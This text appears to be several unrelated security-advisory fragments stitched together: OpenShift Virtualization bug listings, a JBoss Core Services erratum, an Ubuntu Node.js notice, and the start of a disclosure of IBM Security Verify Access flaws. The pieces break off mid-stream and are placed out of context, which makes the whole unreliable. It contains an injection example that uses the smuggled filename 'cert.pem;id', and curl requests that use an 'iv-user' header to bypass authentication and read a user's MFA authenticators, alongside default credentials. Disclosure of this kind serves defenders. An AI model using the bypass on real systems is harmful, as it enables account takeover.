2104785 - "Add disk" and "Disks" are on the same line
2104859 - [RFE] Add "Copy SSH command" to VM action list
2105257 - Can't set log verbosity level for virt-operator pod
2106175 - All pages are crashed after visit Virtualization -> Overview
2106963 - Cannot add configmap for windows VM
2107279 - VM Template's bootable disk can be marked as bootable
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse functions
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal
2108339 - datasource does not provide timestamp when updated
2108638 - When choosing a vm or template while in all-namespace, and returning to list, namespace is changed
2109818 - Upstream metrics documentation is not detailed enough
2109975 - DataVolume fails to import "cirros-container-disk-demo" image
2110256 - Storage -> PVC -> upload data, does not support source reference
2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls
2111240 - GiB changes to B in Template's Edit boot source reference modal
2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics
2111328 - kubevirt plugin console crashed after visit vmi page
2111378 - VM SSH command generated by UI points at api VIP
2111744 - Cloned template should not label app.kubernetes.io/name: common-templates
2111794 - the virtlogd process is taking too much RAM! (17468Ki > 17Mi)
2112900 - button style are different
2114516 - Nothing happens after clicking on Fedora cloud image list link
2114636 - The style of displayed items are not unified on VM tabs
2114683 - VM overview tab is crashed just after the vm is created
2115257 - Need to Change system-product-name to "OpenShift Virtualization" in CNV-4.12
2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass
2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items
2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates
2116225 - The filter keyword of the related operator 'Openshift Data Foundation' is 'OCS' rather than 'ODF'
2116644 - Importer pod is failing to start with error "MountVolume.SetUp failed for volume "cdi-proxy-cert-vol" : configmap "custom-ca" not found"
2117549 - Cannot edit cloud-init data after add ssh key
2117803 - Cannot edit ssh even vm is stopped
2117813 - Improve descriptive text of VM details while VM is off
2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs
2118257 - outdated doc link tolerations modal
2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format
2119069 - Unable to start windows VMs on PSI setups
2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2119309 - readinessProbe in VM stays on failed
2119615 - Change the disk size causes the unit changed
2120907 - Cannot filter disks by label
2121320 - Negative values in migration metrics
2122236 - Failing to delete HCO with SSP sticking around
2122990 - VMExport should check APIGroup
2124147 - "ReadOnlyMany" should not be added to supported values in memory dump
2124307 - Ui crash/stuck on loading when trying to detach disk on a VM
2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it
2124555 - View documentation link on MigrationPolicies page does not work
2124557 - MigrationPolicy description is not displayed on Details page
2124558 - Non-privileged user can start MigrationPolicy creation
2124565 - Deleted DataSource reappears in list
2124572 - First annotation can not be added to DataSource
2124582 - Filtering VMs by OS does not work
2124594 - Docker URL validation is inconsistent over application
2124597 - Wrong case in Create DataSource menu
2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile
2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state
2127787 - Expose the PVC source of the dataSource on UI
2127843 - UI crashed by selecting "Live migration network"
2127931 - Change default time range on Virtualization -> Overview -> Monitoring dashboard to 30 minutes
2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer
2128002 - Error after VM template deletion
2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards
2128872 - [4.11]Can't restore cloned VM
2128948 - Cannot create DataSource from default YAML
2128949 - Cannot create MigrationPolicy from example YAML
2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2129013 - Mark Windows 11 as TechPreview
2129234 - Service is not deleted along with the VM when the VM is created from a template with service
2129301 - Cloud-init network data don't wipe out on uncheck checkbox 'Add network data'
2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook
2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV
2130588 - crypto-policy : Common Ciphers support by apiserver and hco
2130695 - crypto-policy : Logging Improvement and publish the source of ciphers
2130909 - Non-privileged user can start DataSource creation
2131157 - KV data transfer rate chart in VM Metrics tab is not displayed
2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough
2131674 - Bump virtlogd memory requirement to 20Mi
2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11
2132682 - Default YAML entity name convention.
2132721 - Delete dialogs
2132744 - Description text is missing in Live Migrations section
2132746 - Background is broken in Virtualization Monitoring page
2132783 - VM can not be created from Template with edited boot source
2132793 - Edited Template BSR is not saved
2132932 - Typo in PVC size units menu
2133540 - [pod security violation audit] Audit violation in "cni-plugins" container should be fixed
2133541 - [pod security violation audit] Audit violation in "bridge-marker" container should be fixed
2133542 - [pod security violation audit] Audit violation in "manager" container should be fixed
2133543 - [pod security violation audit] Audit violation in "kube-rbac-proxy" container should be fixed
2133655 - [pod security violation audit] Audit violation in "cdi-operator" container should be fixed
2133656 - [4.12][pod security violation audit] Audit violation in "hostpath-provisioner-operator" container should be fixed
2133659 - [pod security violation audit] Audit violation in "cdi-controller" container should be fixed
2133660 - [pod security violation audit] Audit violation in "cdi-source-update-poller" container should be fixed
2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod
2134672 - [e2e] add data-test-id for catalog -> storage section
2134825 - Authorization for expand-spec endpoint missing
2135805 - Windows 2022 template is missing vTPM and UEFI params in spec
2136051 - Name jumping when trying to create a VM with source from catalog
2136425 - Windows 11 is detected as Windows 10
2136534 - Not possible to specify a TTL on VMExports
2137123 - VMExport: export pod is not PSA compliant
2137241 - Checkbox about delete vm disks is not loaded while deleting VM
2137243 - registry input adds docker prefix twice
2137349 - "Manage source" action infinitely loading on DataImportCron details page
2137591 - Inconsistent dialog headings/titles
2137731 - Link of VM status in overview is not working
2137733 - No link for VMs in error status in "VirtualMachine statuses" card
2137736 - The column name "MigrationPolicy name" can just be "Name"
2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly
2138112 - Unsupported S3 endpoint option in Add disk modal
2138119 - "Customize VirtualMachine" flow is not user-friendly because settings are split into 2 modals
2138199 - Win11 and Win22 templates are not filtered properly by Template provider
2138653 - Saving Template parameters reloads the page
2138657 - Setting DATA_SOURCE_ Template parameters makes VM creation fail
2138664 - VM that was created with SSH key fails to start
2139257 - Cannot add disk via "Using an existing PVC"
2139260 - Clone button is disabled while VM is running
2139293 - Non-admin user cannot load VM list page
2139296 - Non-admin cannot load MigrationPolicies page
2139299 - No auto-generated VM name while creating VM by non-admin user
2139306 - Non-admin cannot create VM via customize mode
2139479 - virtualization overview crashes for non-priv user
2139574 - VM name gets "emptyname" if click the create button quickly
2139651 - non-priv user can click create when have no permissions
2139687 - catalog shows template list for non-priv users
2139738 - [4.12]Can't restore cloned VM
2139820 - non-priv user cant reach vm details
2140117 - Provide upgrade path from 4.11.1->4.12.0
2140521 - Click the breadcrumb list about "VirtualMachines" goes to undefined project
2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user
2140627 - Not able to select storageClass if there is no default storageclass defined
2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user
2140808 - Hyperv feature set to "enabled: false" prevents scheduling
2140977 - Alerts number is not correct on Virtualization overview
2140982 - The base template of cloned template is "Not available"
2140998 - Incorrect information shows in overview page per namespace
2141089 - Unable to upload boot images.
2141302 - Unhealthy states alerts and state metrics are missing
2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations
2141494 - "Start in pause mode" option is not available while creating the VM
2141654 - warning log appearing on VMs: found no SR-IOV networks
2141711 - Node column selector is redundant for non-priv user
2142468 - VM action "Stop" should not be disabled when VM in pause state
2142470 - Delete a VM or template from all projects leads to 404 error
2142511 - Enhance alerts card in overview
2142647 - Error after MigrationPolicy deletion
2142891 - VM latency checkup: Failed to create the checkup's Job
2142929 - Permission denied when trying to get instancetypes
2143268 - Topolvm storageProfile missing accessModes and volumeMode
2143498 - Could not load template while creating VM from catalog
2143964 - Could not load template while creating VM from catalog
2144580 - "?" icon is too big in VM Template Disk tab
2144828 - "?" icon is too big in VM Template Disk tab
2144839 - Alerts number is not correct on Virtualization overview
2153849 - After upgrade to 4.11.1->4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten
2155757 - Incorrect upstream-version label "v1.6.0-unstable-410-g09ea881c" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container
- Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes, linked to in the References.
The References section of this erratum contains a download link for the update. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.
Security Fix(es):
- libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)
- libxml2: dict corruption caused by entity reference cycles (CVE-2022-40304)
- expat: a use-after-free in the doContent function in xmlparse.c (CVE-2022-40674)
- zlib: a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field (CVE-2022-37434)
- curl: HSTS bypass via IDN (CVE-2022-42916)
- curl: HTTP proxy double-free (CVE-2022-42915)
- curl: POST following PUT confusion (CVE-2022-32221)
- httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism (CVE-2022-31813)
- httpd: mod_sed: DoS vulnerability (CVE-2022-30522)
- httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)
- httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)
- httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)
- curl: control code in cookie denial of service (CVE-2022-35252)
- jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)
- curl: Unpreserved file permissions (CVE-2022-32207)
- curl: various flaws (CVE-2022-32206, CVE-2022-32208)
- openssl: the c_rehash script allows command injection (CVE-2022-2068)
- openssl: c_rehash script allows command injection (CVE-2022-1292)
- jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody (CVE-2022-22721)
- jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds (CVE-2022-23943)
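The two c_rehash issues above (CVE-2022-1292, CVE-2022-2068) were shell command injections: the script assembled a shell command line out of certificate filenames, so metacharacters in a filename were interpreted by the shell. A minimal sketch of that bug class follows; this is illustrative Python, not the actual Perl code from c_rehash, and the openssl arguments shown are an assumption:

```python
def hash_cert_unsafe(filename: str) -> str:
    # Vulnerable pattern: the attacker-controlled filename is spliced
    # directly into a shell command string, so a ';' in it would start
    # a second command when the string is handed to a shell.
    return "openssl x509 -hash -noout -in " + filename

def hash_cert_safe(filename: str) -> list[str]:
    # Safe pattern: pass the filename as one discrete argv element and
    # never involve a shell; metacharacters stay literal.
    return ["openssl", "x509", "-hash", "-noout", "-in", filename]

malicious = "cert.pem;id"
print(hash_cert_unsafe(malicious))    # the ';id' would run as a command
print(hash_cert_safe(malicious)[-1])  # stays a single literal argument
```

The fix shipped for these CVEs followed the same principle: stop routing untrusted filenames through a shell.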
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bugs fixed (https://bugzilla.redhat.com/):
2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds
2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody
2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection
2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling
2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read
2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite()
2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match()
2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability
2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism
2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection
2099300 - CVE-2022-32206 curl: HTTP compression denial of service
2099305 - CVE-2022-32207 curl: Unpreserved file permissions
2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification
2116639 - CVE-2022-37434 zlib: heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field
2120718 - CVE-2022-35252 curl: control code in cookie denial of service
2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c
2135411 - CVE-2022-32221 curl: POST following PUT confusion
2135413 - CVE-2022-42915 curl: HTTP proxy double-free
2135416 - CVE-2022-42916 curl: HSTS bypass via IDN
2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE
2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles
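CVE-2022-37434 above is triggered through the optional "extra field" in a gzip member header. As a sketch of where that field sits in the format, the following builds a valid gzip member carrying an FEXTRA block using only the Python standard library; the subfield id "AB" and its four data bytes are arbitrary illustrative values:

```python
import gzip
import struct
import zlib

FEXTRA = 0x04  # FLG bit: an "extra field" follows the 10-byte header

# Subfield: 2-byte id, 2-byte little-endian length, then the data itself.
extra = b"AB" + struct.pack("<H", 4) + b"\x00\x01\x02\x03"

# 10-byte member header: magic, CM=8 (deflate), FLG, MTIME, XFL, OS.
header = struct.pack("<2sBBIBB", b"\x1f\x8b", 8, FEXTRA, 0, 0, 255)
header += struct.pack("<H", len(extra)) + extra  # XLEN, then the field

payload = b"hello"
body = zlib.compress(payload)[2:-4]  # strip zlib wrapper -> raw deflate
trailer = struct.pack("<II", zlib.crc32(payload), len(payload))

member = header + body + trailer
print(gzip.decompress(member))  # b'hello'
```

The flaw was an out-of-bounds read while inflate() processed a large extra field; a decoder that parses XLEN and the subfields without bounding reads to the declared lengths exhibits exactly this class of bug.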
- ==========================================================================
Ubuntu Security Notice USN-6457-1
October 30, 2023
nodejs vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 22.04 LTS
Summary:
Several security issues were fixed in Node.js.
Software Description:
- nodejs: An open-source, cross-platform JavaScript runtime environment.
Details:
Tavis Ormandy discovered that Node.js incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service. (CVE-2022-0778)
Elison Niven discovered that Node.js incorrectly handled certain inputs. (CVE-2022-1292)
Chancen and Daniel Fiala discovered that Node.js incorrectly handled certain inputs. (CVE-2022-2068)
Alex Chernyakhovsky discovered that Node.js incorrectly handled certain inputs. (CVE-2022-2097)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 22.04 LTS:
  libnode-dev 12.22.9~dfsg-1ubuntu3.1
  libnode72 12.22.9~dfsg-1ubuntu3.1
  nodejs 12.22.9~dfsg-1ubuntu3.1
  nodejs-doc 12.22.9~dfsg-1ubuntu3.1
In general, a standard system update will make all the necessary changes.
Solution:
For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly, for detailed release notes:
https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html
For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:
https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html
- Bugs fixed (https://bugzilla.redhat.com/):
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects
2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays
- JIRA issues fixed (https://issues.jboss.org/):
LOG-3293 - log-file-metric-exporter container has no limits, exhausting the resources of the node
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory Information
Title: 32 vulnerabilities in IBM Security Verify Access
Advisory URL: https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt
Blog URL: https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html
Date published: 2024-11-01
Vendors contacted: IBM
Release mode: Released
CVE: CVE-2022-2068, CVE-2023-30997, CVE-2023-30998, CVE-2023-31001, CVE-2023-31004, CVE-2023-31005, CVE-2023-31006, CVE-2023-32328, CVE-2023-32329, CVE-2023-32330, CVE-2023-38267, CVE-2023-38267, CVE-2023-38368, CVE-2023-38369, CVE-2023-38370, CVE-2023-43017, CVE-2024-25027, CVE-2024-35137, CVE-2024-35139, CVE-2024-35140, CVE-2024-35141, CVE-2024-35142
Product description
IBM Security Verify Access is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. In addition to state-of-the-art security policy management, IBM Security Verify Access provides authentication, authorization, data security, and centralized resource management capabilities.
IBM Security Verify Access offers the following features:
- Authentication
Provides a wide range of built-in authenticators and supports external authenticators.
- Authorization
Provides permit and deny decisions for protected resources requests in the secure domain through the authorization API.
- Data security and centralized resource management
Manages secure access to private internal network-based resources by using the public Internet's broad connectivity and ease of use with a corporate firewall system.
From https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access
Vulnerability Summary
Vulnerable versions: IBM Security Verify Access < 10.0.8.
The summary of the vulnerabilities is as follows:
- non-assigned CVE vulnerability - Authentication Bypass on IBM Security Verify Runtime
- CVE-2024-25027 - Reuse of snapshot private keys
- CVE-2023-30997 - Local Privilege Escalation using OpenLDAP
- CVE-2023-30998 - Local Privilege Escalation using rpm
- CVE-2023-38267, CVE-2024-35141, CVE-2024-35142 - Insecure setuid binaries and multiple Local Privilege Escalations in IBM code:
  5.1. CVE-2023-38267 - Local Privilege Escalation using mesa_config - import of a new snapshot
  5.2. CVE-2024-35141 - Local Privilege Escalation using mesa_config - command injections
  5.3. CVE-2023-38267 - Local Privilege Escalation using mesa_cli - import of a new snapshot
  5.4. CVE-2024-35142 - Local Privilege Escalation using mesa_cli - telnet escape shell
- CVE-2023-43017 - PermitRootLogin set to yes
- CVE-2024-35137 and CVE-2024-35139 - Lack of password for the clusteruser
- CVE-2023-38368 - Non-standard way of storing hashes and world-readable files containing hashes
- CVE-2023-38369 - Hardcoded PKCS#12 files
- CVE-2023-31001 - Incorrect permissions in verify-access-dsc (race condition and leak of private key)
- non-assigned CVE vulnerability - Insecure health_check.sh script in verify-access (race condition and leak of private key)
- CVE-2024-35140 - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)
- CVE-2024-35140 (duplicate?) - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)
- CVE-2023-31004 - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp
- CVE-2023-31005 - Lack of authentication in Postgres inside verify-access-runtime
- CVE-2023-31006 - Null pointer dereference in dscd - Remote DoS against DSC instances
- CVE-2023-32327 - XML External Entity (XXE) in dscd
- CVE-2023-38370 - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)
- non-assigned CVE vulnerability - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)
- CVE-2023-32328 - Remote Code Execution due to insecure Repository configuration
- CVE-2023-32329 - Additional repository configuration (potential supply-chain attack)
- non-assigned CVE vulnerability - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime
- CVE-2023-32330 - Remote Code Execution due to insecure reload script in verify-access-runtime
- CVE-2023-32330 (duplicate?) - Remote Code Execution due to insecure reload script in verify-access-wrp
- non-assigned CVE vulnerability - Hardcoded private key for IBM ISS (ibmcom/verify-access)
- non-assigned CVE vulnerability - dcatool using an outdated OpenSSL library (ibmcom/verify-access)
- non-assigned CVE vulnerability - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys
- non-assigned CVE vulnerability - Outdated "IBM Crypto for C" library
- non-assigned CVE vulnerability - Webseald using outdated code with remotely exploitable vulnerabilities:
  30.1. libmodsecurity.so - 1 non-assigned CVE vulnerability
  30.2. libtivsec_yamlcpp.so - 4 CVEs
  30.3. libtivsec_xml4c.so - outdated Xerces-C library
- non-assigned CVE vulnerability - Outdated and untrusted CAs used in the Docker images
- non-assigned CVE vulnerability - Lack of privilege separation in Docker instances
TL;DR: An attacker can compromise IBM Security Verify Access using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). IBM Security Verify Access is an SSO solution mainly used by banks, Fortune 500 companies and governmental entities.
Miscellaneous notes:
The vulnerabilities were found in October 2022 and were communicated to IBM at the beginning of 2023. They were ultimately patched at the end of June 2024 (after 18 months). Requiring 1.5 years to provide security patches for vulnerabilities found in an SSO solution does not appear to be on par with current cybersecurity risks and is quite worrying. Update: Following communications with IBM PSIRT in September 2024 regarding missing CVEs and the publication of this security advisory, it was confirmed that at least one vulnerability was not yet patched (a 2017 DoS in libinjection, no CVE).
The vulnerabilities were patched progressively in the 10.0.6, 10.0.7 and 10.0.8 versions. It is unclear whether all the non-assigned CVE vulnerabilities have been patched, but IBM confirmed that all the vulnerabilities were patched and then closed all the corresponding tickets.
Other issues were reported but ultimately dismissed (e.g. hard-to-trigger crashes; I did not have any time left for this security assessment).
Communication with IBM was difficult since IBM closed the tickets used to track the vulnerabilities multiple times without releasing any security patches. The timeline provided later in this advisory gives an overview of my interactions with IBM. IBM PSIRT redirected queries to IBM support, and IBM support provided extremely disappointing answers about the vulnerabilities. When I went back to IBM PSIRT with these answers, IBM PSIRT rejected them and provided opposite answers. Reporting vulnerabilities to IBM was also inefficient. When I asked IBM about missing CVEs in September 2024, IBM PSIRT confirmed that patches were missing, even though all the tickets had already been closed in June 2024 and I had previously received confirmation that all the vulnerabilities were patched.
Security bulletins were mainly found by following @CVEnew (https://twitter.com/CVEnew) and I had to guess the patched vulnerabilities from the CVE descriptions. After some requests, thankfully, IBM sent me a list of CVEs corresponding to the vulnerabilities I reported.
It appears that some CVEs are still missing.
Finally, another CVE (CVE-2023-38371 - https://nvd.nist.gov/vuln/detail/CVE-2023-38371, not present in this advisory) was assigned by IBM but refers to an issue (V-[REDACTED] - Insecure SSLv3 connections to the DSC servers in the report sent to IBM) that was confirmed not to be a vulnerability by IBM and by me, after a second analysis. This CVE is likely to be revoked. Update: IBM confirmed in September 2024 that this CVE was bogus after I signaled to IBM that it was incorrect.
Impacts
An attacker can compromise the entire authentication infrastructure based on IBM Security Verify Access (ISAM/ISVA appliances and IBM Docker images) using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). Regarding the threat model, it is worth noting that attackers must be able to MITM traffic or get access inside the LAN of the tested organizations to exploit these vulnerabilities.
When the IBM Security Verify Access (ISVA) runtime docker instance (a core component of this solution) is reachable over the network, an attacker can bypass the entire authentication and interact with this back-end instance as any user, providing complete control over any user without authentication. The IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities and is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users (for example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn...). The back-end APIs provided by the IBM Security Verify Access runtime docker instance are vulnerable to an authentication bypass vulnerability. Since the back-end is fully reachable, this vulnerability allows an attacker to get persistence in a targeted infrastructure by enrolling malicious Multi-Factor Authenticators to any user, without authentication (e.g. an authenticator assigned to any user, protected by a PIN (or not) chosen by the threat actor). In an offensive scenario, an attacker will likely delete authenticators for admins and the security team, enroll new authenticators corresponding to admin accounts, and get full control over the infrastructure while locking out legitimate admins.
This vulnerability has not been patched and IBM recommends implementing network restrictions or using mutual TLS authentication and following best practices:
Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication.
From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1
And from https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters
And from https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications
Note that even with network restrictions, a low privileged user on a trusted machine can fully compromise the authentication solution, since the back-end used to manage the entire authentication infrastructure can be reached without authentication by sending a specific HTTP header. Network exposure of this back-end (e.g. with IPv6, from monitoring servers, from docker servers, from webseal servers [that must, by design, reach the authentication back-end], or using a SSRF vulnerability) means a full takeover of the authentication infrastructure, which can be quite problematic for large organizations.
Recommendations
- Apply security patches.
- Use network segmentation to isolate the Security Verify Access (ISVA) Runtime Docker instance.
- Implement the optional authentication based on SSL certificates in the ISVA Runtime Docker instance (this functionality has been added in the latest ISVA release (10.0.8)).
- Flag any additional authenticator added to an account as suspicious.
- Review logs for any HTTP access from untrusted IPs to the Security Verify Access Runtime Docker instance.
Shodan provides a list of websites using this technology. For SOC teams, I suggest using Shodan to check if your organization is using IBM Security Verify Access and following IBM's security recommendations. Please note that due to the versatility of this solution, it is very difficult to correctly detect affected installations using a blackbox approach:
- https://www.shodan.io/search?query=http.favicon.hash%3A-2069014068, 1,740 results as of October 30, 2024
- https://www.shodan.io/search?query=webseal, 1,083 results as of October 30, 2024
- https://www.shodan.io/search?query=CP%3D%22NON+CUR+OTPi+OUR+NOR+UNI%22, 6,673 results as of October 30, 2024
Details - Authentication Bypass on IBM Security Verify Runtime
It is possible to compromise the authentication mechanism and the authentication infrastructure by reaching the APIs provided by the IBM Security Verify Runtime Docker instance.
The threat model for this vulnerability requires an attacker with network connectivity to the IBM Security Verify Runtime Docker instance (i) from the Internet (if this service is insecurely exposed) or (ii) more likely from within the LAN of the audited organization (meaning the threat actor can reach the HTTPS server of the IBM Security Verify Runtime Docker instance).
The IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities. It is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users. For example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn...
The different authentication mechanisms in the APIs provided by the Runtime Docker instance used to manage users (e.g. adding an authenticator for a specific user, removing an authenticator, getting seeds, ...) can be trivially bypassed by specifying an additional HTTP header iv-user: target-user (e.g. iv-user: admin) in the HTTPS requests.
Adding an additional HTTP header iv-user: target-user when querying the APIs will provide a complete control over the target-user.
There is an HTTPS server reachable on port 443/tcp providing APIs:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Usually, the IBM Security Verify Runtime Docker instance is only reached by WebSEAL servers (reverse-proxies managing authentication), after a successful authentication as easuser, as shown below:
Documentation from https://www.ibm.com/docs/SSPREK_10.0.0/com.ibm.isva.doc/config/reference/ref_isamcfg_wga_worksheet.htm:
Select the method for authentication between WebSEAL and the Advanced Access Control runtime listening interface
Certificate authentication
Use a certificate to authenticate between WebSEAL and the Advanced Access Control runtime listening interface.
User ID and password authentication
Use credentials to authenticate between WebSEAL and the Advanced Access Control runtime listening interface. The default username is easuser and the default password is passw0rd.
Attack scenario: an attacker will reach the HTTPS APIs provided by the IBM Security Verify Runtime Docker instance and will not use a SSL Certificate or any credential used to manage the instance (easuser).
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Note that while the WebSEAL servers are exposed to the Internet, the runtime instance is located inside the LAN and is not usually exposed to the Internet. The attacker needs to be located inside the LAN to reach the vulnerable APIs.
According to the documentation at https://www.ibm.com/docs/en/sva/10.0.7, we can see that the APIs are always reachable using the /mga/sps/* path. Actually, the /mga/ route seems to be managed by WebSEAL servers while the /sps/* routes are managed by the runtime docker instance.
Without authentication, an attacker can reach the IBM Security Verify Runtime Docker instance by reaching, for example, the /sps/oauth/oauth20/authorize?client_id=ClientID&response_type=code&scope=mmfaAuthn API endpoint and specifying which target user to compromise using the additional HTTP header iv-user: target-user. This specific endpoint is used to enroll a new Multi-Factor Authenticator (e.g. the official IBM Security Verify app (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en)) for the target-user user.
By specifying the HTTP header iv-user: target-user, an attacker can interact with all the APIs located in /sps/* for any user, without authentication.
Listing of authenticators without any cookie or HTTP header - this non-intrusive request allows detecting a vulnerable IBM Security Verify Runtime Docker instance configured to use MFA.
kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators | jq .
{
"result": "FBTRBA306E The user management operation failed because the user is not authenticated."
}
Listing of authenticators for the target-user - with iv-user HTTP header (without session cookies nor specific credentials):
kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H "iv-user: target-user" | jq .
[
{
"device_name": "Iphone 13 Pro Max",
"oauth_grant": "uuida71[REDACTED]",
"auth_methods": [],
"os_version": "13",
"device_type": "[REDACTED]",
"id": "uuid20[REDACTED]",
"enabled": true
},
{
"device_name": "Iphone 13 Pro Max",
"oauth_grant": "uuida71[REDACTED]",
"auth_methods": [],
